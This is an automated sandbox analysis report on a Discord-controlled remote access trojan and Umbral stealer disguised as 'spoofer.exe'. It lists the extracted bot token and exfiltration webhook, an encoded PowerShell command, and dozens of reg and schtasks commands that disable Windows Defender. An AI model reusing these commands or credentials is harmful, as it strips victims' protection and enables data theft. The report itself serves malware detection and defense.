discordrat | 5cac485680e36e9e3cea0867d1373edff3a8995a20d21a2b7aa38247a0a3eb1d

Analysis

max time kernel
118s
max time network
122s
platform
windows7_x64
resource
win7-20231215-en
resource tags

arch:x64arch:x86image:win7-20231215-enlocale:en-usos:windows7-x64system
submitted
19-01-2024 22:21

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

spoofer.exe
Size

442KB
MD5

d5a84036071756dee960de255bd6ab94
SHA1

83b439582a8f3392f18dde97b56d937c518b1cd2
SHA256

5cac485680e36e9e3cea0867d1373edff3a8995a20d21a2b7aa38247a0a3eb1d
SHA512

fe0dec1e8422d9dd74431ccccff23e7083d356498ff98dc1c5680e1553c5145dbf1c854e48263c5d58a18c87c7bc7016294518ec1491045da7f62c1077a07779
SSDEEP

12288:3o0NHvykT8QNmJCDWs2qUa3zYgNl3Qc65snvJ:3phFT8QC6WsVUM7NxQcsaJ

Score

10^/10

discordrat umbral evasion persistence rat rootkit stealer trojan

Malware Config

Extracted

Family

discordrat

Attributes

discord_token
MTE5MzczNzA3MzIzNzE4MDQyNg.GQDWc0.k4Yc3XgNEdmji15f8P6ui2A0sVB2zvpOmkNPlw
server_id
1196510448573489273

Extracted

Family

umbral

https://ptb.discord.com/api/webhooks/1197286741825048616/mPoY62Pti_IE-hGcDYD9Kd5GhKzKQHzuySPby-xlg9GCRDWrviTGJ9au_QMU1pKDVh50

Signatures

Detect Umbral payload 2 IoCs

resource	yara_rule
behavioral1/files/0x0009000000015cd7-15.dat	family_umbral
behavioral1/memory/2708-19-0x0000000000C00000-0x0000000000C40000-memory.dmp	family_umbral

Discord RAT
A RAT written in C# using Discord as a C2.
stealer rootkit rat persistence discordrat

Modifies Windows Defender Real-time Protection settings 3 TTPs 10 IoCs

evasion trojan

Modify Registry

T1112

Windows Service

T1543.003

Disable or Modify Tools

T1562.001

description	ioc	Process
Key created	\REGISTRY\MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection	reg.exe
Key created	\REGISTRY\MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableIOAVProtection = "1"	reg.exe
Key created	\REGISTRY\MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection	reg.exe
Key created	\REGISTRY\MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableBehaviorMonitoring = "1"	reg.exe
Key created	\REGISTRY\MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableOnAccessProtection = "1"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRealtimeMonitoring = "1"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableScanOnRealtimeEnable = "1"	reg.exe

Modifies security service 2 TTPs 1 IoCs

evasion

Modify Registry

T1112

Windows Service

T1543.003

description	ioc	Process
Set value (int)	\REGISTRY\MACHINE\SYSTEM\ControlSet001\services\WinDefend\Start = "4"	reg.exe

Umbral
Umbral stealer is an opensource moduler stealer written in C#.
stealer umbral

Executes dropped EXE 3 IoCs

pid	Process
2388	cleaner.exe
2856	Spoofer.exe
2708	Woofer.exe

Drops file in Windows directory 3 IoCs

description	ioc	Process
File created	C:\Windows\cleaner.exe	spoofer.exe
File created	C:\Windows\Spoofer.exe	spoofer.exe
File created	C:\Windows\Woofer.exe	spoofer.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Suspicious behavior: EnumeratesProcesses 1 IoCs

pid	Process
1084	powershell.exe

Suspicious use of AdjustPrivilegeToken 42 IoCs

description	pid	Process
Token: SeDebugPrivilege	2708	Woofer.exe
Token: SeDebugPrivilege	1084	powershell.exe
Token: SeIncreaseQuotaPrivilege	588	wmic.exe
Token: SeSecurityPrivilege	588	wmic.exe
Token: SeTakeOwnershipPrivilege	588	wmic.exe
Token: SeLoadDriverPrivilege	588	wmic.exe
Token: SeSystemProfilePrivilege	588	wmic.exe
Token: SeSystemtimePrivilege	588	wmic.exe
Token: SeProfSingleProcessPrivilege	588	wmic.exe
Token: SeIncBasePriorityPrivilege	588	wmic.exe
Token: SeCreatePagefilePrivilege	588	wmic.exe
Token: SeBackupPrivilege	588	wmic.exe
Token: SeRestorePrivilege	588	wmic.exe
Token: SeShutdownPrivilege	588	wmic.exe
Token: SeDebugPrivilege	588	wmic.exe
Token: SeSystemEnvironmentPrivilege	588	wmic.exe
Token: SeRemoteShutdownPrivilege	588	wmic.exe
Token: SeUndockPrivilege	588	wmic.exe
Token: SeManageVolumePrivilege	588	wmic.exe
Token: 33	588	wmic.exe
Token: 34	588	wmic.exe
Token: 35	588	wmic.exe
Token: SeIncreaseQuotaPrivilege	588	wmic.exe
Token: SeSecurityPrivilege	588	wmic.exe
Token: SeTakeOwnershipPrivilege	588	wmic.exe
Token: SeLoadDriverPrivilege	588	wmic.exe
Token: SeSystemProfilePrivilege	588	wmic.exe
Token: SeSystemtimePrivilege	588	wmic.exe
Token: SeProfSingleProcessPrivilege	588	wmic.exe
Token: SeIncBasePriorityPrivilege	588	wmic.exe
Token: SeCreatePagefilePrivilege	588	wmic.exe
Token: SeBackupPrivilege	588	wmic.exe
Token: SeRestorePrivilege	588	wmic.exe
Token: SeShutdownPrivilege	588	wmic.exe
Token: SeDebugPrivilege	588	wmic.exe
Token: SeSystemEnvironmentPrivilege	588	wmic.exe
Token: SeRemoteShutdownPrivilege	588	wmic.exe
Token: SeUndockPrivilege	588	wmic.exe
Token: SeManageVolumePrivilege	588	wmic.exe
Token: 33	588	wmic.exe
Token: 34	588	wmic.exe
Token: 35	588	wmic.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 2176 wrote to memory of 1084	2176	spoofer.exe	28
PID 2176 wrote to memory of 1084	2176	spoofer.exe	28
PID 2176 wrote to memory of 1084	2176	spoofer.exe	28
PID 2176 wrote to memory of 1084	2176	spoofer.exe	28
PID 2176 wrote to memory of 2388	2176	spoofer.exe	30
PID 2176 wrote to memory of 2388	2176	spoofer.exe	30
PID 2176 wrote to memory of 2388	2176	spoofer.exe	30
PID 2176 wrote to memory of 2388	2176	spoofer.exe	30
PID 2388 wrote to memory of 2840	2388	cleaner.exe	31
PID 2388 wrote to memory of 2840	2388	cleaner.exe	31
PID 2388 wrote to memory of 2840	2388	cleaner.exe	31
PID 2176 wrote to memory of 2856	2176	spoofer.exe	32
PID 2176 wrote to memory of 2856	2176	spoofer.exe	32
PID 2176 wrote to memory of 2856	2176	spoofer.exe	32
PID 2176 wrote to memory of 2856	2176	spoofer.exe	32
PID 2176 wrote to memory of 2708	2176	spoofer.exe	34
PID 2176 wrote to memory of 2708	2176	spoofer.exe	34
PID 2176 wrote to memory of 2708	2176	spoofer.exe	34
PID 2176 wrote to memory of 2708	2176	spoofer.exe	34
PID 2840 wrote to memory of 2860	2840	cmd.exe	35
PID 2840 wrote to memory of 2860	2840	cmd.exe	35
PID 2840 wrote to memory of 2860	2840	cmd.exe	35
PID 2840 wrote to memory of 2736	2840	cmd.exe	36
PID 2840 wrote to memory of 2736	2840	cmd.exe	36
PID 2840 wrote to memory of 2736	2840	cmd.exe	36
PID 2840 wrote to memory of 3056	2840	cmd.exe	37
PID 2840 wrote to memory of 3056	2840	cmd.exe	37
PID 2840 wrote to memory of 3056	2840	cmd.exe	37
PID 2840 wrote to memory of 2712	2840	cmd.exe	38
PID 2840 wrote to memory of 2712	2840	cmd.exe	38
PID 2840 wrote to memory of 2712	2840	cmd.exe	38
PID 2840 wrote to memory of 2748	2840	cmd.exe	39
PID 2840 wrote to memory of 2748	2840	cmd.exe	39
PID 2840 wrote to memory of 2748	2840	cmd.exe	39
PID 2840 wrote to memory of 2632	2840	cmd.exe	40
PID 2840 wrote to memory of 2632	2840	cmd.exe	40
PID 2840 wrote to memory of 2632	2840	cmd.exe	40
PID 2840 wrote to memory of 2580	2840	cmd.exe	41
PID 2840 wrote to memory of 2580	2840	cmd.exe	41
PID 2840 wrote to memory of 2580	2840	cmd.exe	41
PID 2840 wrote to memory of 2588	2840	cmd.exe	42
PID 2840 wrote to memory of 2588	2840	cmd.exe	42
PID 2840 wrote to memory of 2588	2840	cmd.exe	42
PID 2840 wrote to memory of 2596	2840	cmd.exe	43
PID 2840 wrote to memory of 2596	2840	cmd.exe	43
PID 2840 wrote to memory of 2596	2840	cmd.exe	43
PID 2840 wrote to memory of 2640	2840	cmd.exe	44
PID 2840 wrote to memory of 2640	2840	cmd.exe	44
PID 2840 wrote to memory of 2640	2840	cmd.exe	44
PID 2840 wrote to memory of 2652	2840	cmd.exe	45
PID 2840 wrote to memory of 2652	2840	cmd.exe	45
PID 2840 wrote to memory of 2652	2840	cmd.exe	45
PID 2840 wrote to memory of 2696	2840	cmd.exe	46
PID 2840 wrote to memory of 2696	2840	cmd.exe	46
PID 2840 wrote to memory of 2696	2840	cmd.exe	46
PID 2840 wrote to memory of 3036	2840	cmd.exe	47
PID 2840 wrote to memory of 3036	2840	cmd.exe	47
PID 2840 wrote to memory of 3036	2840	cmd.exe	47
PID 2840 wrote to memory of 3032	2840	cmd.exe	48
PID 2840 wrote to memory of 3032	2840	cmd.exe	48
PID 2840 wrote to memory of 3032	2840	cmd.exe	48
PID 2840 wrote to memory of 3048	2840	cmd.exe	49
PID 2840 wrote to memory of 3048	2840	cmd.exe	49
PID 2840 wrote to memory of 3048	2840	cmd.exe	49

Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
persistence

Query Registry
T1012

C:\Users\Admin\AppData\Local\Temp\spoofer.exe
"C:\Users\Admin\AppData\Local\Temp\spoofer.exe"
1⤵
- Drops file in Windows directory
- Suspicious use of WriteProcessMemory
PID:2176
- C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGQAcQB3ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHQAZgB1ACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHAAawBoACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGIAdQB1ACMAPgA="
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:1084
- C:\Windows\cleaner.exe
  "C:\Windows\cleaner.exe"
  2⤵
  - Executes dropped EXE
  - Suspicious use of WriteProcessMemory
  PID:2388
- - C:\Windows\system32\cmd.exe
    "C:\Windows\system32\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\4135.tmp\4136.tmp\4137.bat C:\Windows\cleaner.exe"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:2840
  - - C:\Windows\system32\reg.exe
      reg delete "HKLM\Software\Policies\Microsoft\Windows Defender" /f
      4⤵
      PID:2860
  - - C:\Windows\system32\reg.exe
      reg add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d "1" /f
      4⤵
      PID:2736
  - - C:\Windows\system32\reg.exe
      reg add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiVirus" /t REG_DWORD /d "1" /f
      4⤵
      PID:3056
  - - C:\Windows\system32\reg.exe
      reg add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableRoutinelyTakingAction" /t REG_DWORD /d "1" /f
      4⤵
      PID:2712
  - - C:\Windows\system32\reg.exe
      reg add "HKLM\Software\Policies\Microsoft\Windows Defender\MpEngine" /v "MpEnablePus" /t REG_DWORD /d "0" /f
      4⤵
      PID:2748
  - - C:\Windows\system32\reg.exe
      reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableBehaviorMonitoring" /t REG_DWORD /d "1" /f
      4⤵
      Modifies Windows Defender Real-time Protection settings
      PID:2632
  - - C:\Windows\system32\reg.exe
      reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableIOAVProtection" /t REG_DWORD /d "1" /f
      4⤵
      Modifies Windows Defender Real-time Protection settings
      PID:2580
  - - C:\Windows\system32\reg.exe
      reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableOnAccessProtection" /t REG_DWORD /d "1" /f
      4⤵
      Modifies Windows Defender Real-time Protection settings
      PID:2588
  - - C:\Windows\system32\reg.exe
      reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableRealtimeMonitoring" /t REG_DWORD /d "1" /f
      4⤵
      Modifies Windows Defender Real-time Protection settings
      PID:2596
  - - C:\Windows\system32\reg.exe
      reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableScanOnRealtimeEnable" /t REG_DWORD /d "1" /f
      4⤵
      Modifies Windows Defender Real-time Protection settings
      PID:2640
  - - C:\Windows\system32\reg.exe
      reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Reporting" /v "DisableEnhancedNotifications" /t REG_DWORD /d "1" /f
      4⤵
      PID:2652
  - - C:\Windows\system32\reg.exe
      reg add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "DisableBlockAtFirstSeen" /t REG_DWORD /d "1" /f
      4⤵
      PID:2696
  - - C:\Windows\system32\reg.exe
      reg add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SpynetReporting" /t REG_DWORD /d "0" /f
      4⤵
      PID:3036
  - - C:\Windows\system32\reg.exe
      reg add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SubmitSamplesConsent" /t REG_DWORD /d "2" /f
      4⤵
      PID:3032
  - - C:\Windows\system32\reg.exe
      reg add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderApiLogger" /v "Start" /t REG_DWORD /d "0" /f
      4⤵
      PID:3048
  - - C:\Windows\system32\reg.exe
      reg add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderAuditLogger" /v "Start" /t REG_DWORD /d "0" /f
      4⤵
      PID:2376
  - - C:\Windows\system32\schtasks.exe
      schtasks /Change /TN "Microsoft\Windows\ExploitGuard\ExploitGuard MDM policy Refresh" /Disable
      4⤵
      PID:3052
  - - C:\Windows\system32\schtasks.exe
      schtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cache Maintenance" /Disable
      4⤵
      PID:2880
  - - C:\Windows\system32\schtasks.exe
      schtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cleanup" /Disable
      4⤵
      PID:2888
  - - C:\Windows\system32\schtasks.exe
      schtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Scheduled Scan" /Disable
      4⤵
      PID:2916
  - - C:\Windows\system32\schtasks.exe
      schtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Verification" /Disable
      4⤵
      PID:2936
  - - C:\Windows\system32\reg.exe
      reg delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Explorer\StartupApproved\Run" /v "SecurityHealth" /f
      4⤵
      PID:3040
  - - C:\Windows\system32\reg.exe
      reg delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Run" /v "SecurityHealth" /f
      4⤵
      PID:2028
  - - C:\Windows\system32\reg.exe
      reg delete "HKCR\Directory\shellex\ContextMenuHandlers\EPP" /f
      4⤵
      PID:1968
  - - C:\Windows\system32\reg.exe
      reg delete "HKCR\Drive\shellex\ContextMenuHandlers\EPP" /f
      4⤵
      PID:2232
  - - C:\Windows\system32\reg.exe
      reg delete "HKCR\*\shellex\ContextMenuHandlers\EPP" /f
      4⤵
      PID:1260
  - - C:\Windows\system32\reg.exe
      reg add "HKLM\System\CurrentControlSet\Services\WdBoot" /v "Start" /t REG_DWORD /d "4" /f
      4⤵
      PID:2548
  - - C:\Windows\system32\reg.exe
      reg add "HKLM\System\CurrentControlSet\Services\WdFilter" /v "Start" /t REG_DWORD /d "4" /f
      4⤵
      PID:1888
  - - C:\Windows\system32\reg.exe
      reg add "HKLM\System\CurrentControlSet\Services\WdNisDrv" /v "Start" /t REG_DWORD /d "4" /f
      4⤵
      PID:636
  - - C:\Windows\system32\reg.exe
      reg add "HKLM\System\CurrentControlSet\Services\WdNisSvc" /v "Start" /t REG_DWORD /d "4" /f
      4⤵
      PID:1956
  - - C:\Windows\system32\reg.exe
      reg add "HKLM\System\CurrentControlSet\Services\WinDefend" /v "Start" /t REG_DWORD /d "4" /f
      4⤵
      Modifies security service
      PID:2008
- C:\Windows\Spoofer.exe
  "C:\Windows\Spoofer.exe"
  2⤵
  - Executes dropped EXE
  PID:2856
- - C:\Windows\system32\WerFault.exe
    C:\Windows\system32\WerFault.exe -u -p 2856 -s 596
    3⤵
    PID:2012
- C:\Windows\Woofer.exe
  "C:\Windows\Woofer.exe"
  2⤵
  - Executes dropped EXE
  - Suspicious use of AdjustPrivilegeToken
  PID:2708
- - C:\Windows\System32\Wbem\wmic.exe
    "wmic.exe" csproduct get uuid
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:588

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Create or Modify System Process

T1543

Windows Service

T1543.003

Privilege Escalation

Create or Modify System Process

T1543

Windows Service

T1543.003

Defense Evasion

Impair Defenses

T1562

Disable or Modify Tools

T1562.001

Modify Registry

T1112

Credential Access

Discovery

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\4135.tmp\4136.tmp\4137.bat

Filesize
3KB

MD5
37a937d63e6dcc8f8de4b8847d210546

SHA1
98ca34f1a7cf66d583822b83cd1c65a1fb7f1d4a

SHA256
111ac48198ba45919584668ed9ad15010d316de7f1665f4d42ec249259f696bc

SHA512
062046aca604cf5f329590b1a9ee317974b45f0bdc18f70b74489ece55737480cbb5544d1ced8f5d0e8c66af4b38085ac4e70f26dac2b6d6a50d26f9b36e2b46

Download Submit
C:\Windows\Spoofer.exe

Filesize
78KB

MD5
698d53d0e0b33c8eeec2dc5ee507e971

SHA1
a4c4999c0aeeb2552ec063960a37a4296bf6eb02

SHA256
3dbf21a8a065a297e0d16148f3931315e4e25e1872eed4fd9a256191571a223d

SHA512
5c6ec88ee5b93476f522d87f8edd4b8a1ce78ea47b8ee7d320941a092b5943877ff3a639a00589d6d2e937a41019ad12408576c4223d7a9ac87826d3385abef5

Download Submit
C:\Windows\Woofer.exe

Filesize
231KB

MD5
c0922cfbf0bc3b88f4ab89146f1c5225

SHA1
c9120012509c3942e0299c1c7eb9fe190b978917

SHA256
59f283a7f4a7d50e13c963bb2ae0b3ebd0433bb73f2d582b2c9dd0e7564bce0d

SHA512
d7aaed129723526b66eb8e7917e893426d035bb2583200680cc2683038203dfdd7d48d0deaece13ea4de7eefcd948a891e6f107d19dc0e5f64a0dd760f100b9f

Download Submit
C:\Windows\cleaner.exe

Filesize
127KB

MD5
86cb66d7f7740d8ae241ff6dae24a963

SHA1
19aff29c5319ba0bcbab649d16412b5e27f3e07c

SHA256
cea237087535cd1e6ed4c1fd199e9b297a2720eeac41eadd1976d2efda7bf9cf

SHA512
b8d1839e669795b0506448a2de98992ceccc5e24b4e6fb8c81397d3991cbfe56f0e285878ffcfe10a186bf2833343566208ae8d8af7b8f39ddbd2f316a410322

Download Submit
memory/1084-25-0x00000000741A0000-0x000000007474B000-memory.dmp

Filesize
5.7MB

Download
memory/1084-24-0x0000000002580000-0x00000000025C0000-memory.dmp

Filesize
256KB

Download
memory/1084-29-0x00000000741A0000-0x000000007474B000-memory.dmp

Filesize
5.7MB

Download
memory/1084-26-0x0000000002580000-0x00000000025C0000-memory.dmp

Filesize
256KB

Download
memory/1084-31-0x00000000741A0000-0x000000007474B000-memory.dmp

Filesize
5.7MB

Download
memory/1084-30-0x0000000002580000-0x00000000025C0000-memory.dmp

Filesize
256KB

Download
memory/2708-19-0x0000000000C00000-0x0000000000C40000-memory.dmp

Filesize
256KB

Download
memory/2708-32-0x000007FEF5B30000-0x000007FEF651C000-memory.dmp

Filesize
9.9MB

Download
memory/2708-23-0x000007FEF5B30000-0x000007FEF651C000-memory.dmp

Filesize
9.9MB

Download
memory/2708-27-0x000000001B240000-0x000000001B2C0000-memory.dmp

Filesize
512KB

Download
memory/2856-18-0x000000013F2B0000-0x000000013F2C8000-memory.dmp

Filesize
96KB

Download
memory/2856-28-0x000000001AF00000-0x000000001AF80000-memory.dmp

Filesize
512KB

Download
memory/2856-22-0x000007FEF5B30000-0x000007FEF651C000-memory.dmp

Filesize
9.9MB

Download
memory/2856-33-0x000007FEF5B30000-0x000007FEF651C000-memory.dmp

Filesize
9.9MB

Download
memory/2856-34-0x000000001AF00000-0x000000001AF80000-memory.dmp

Filesize
512KB

Download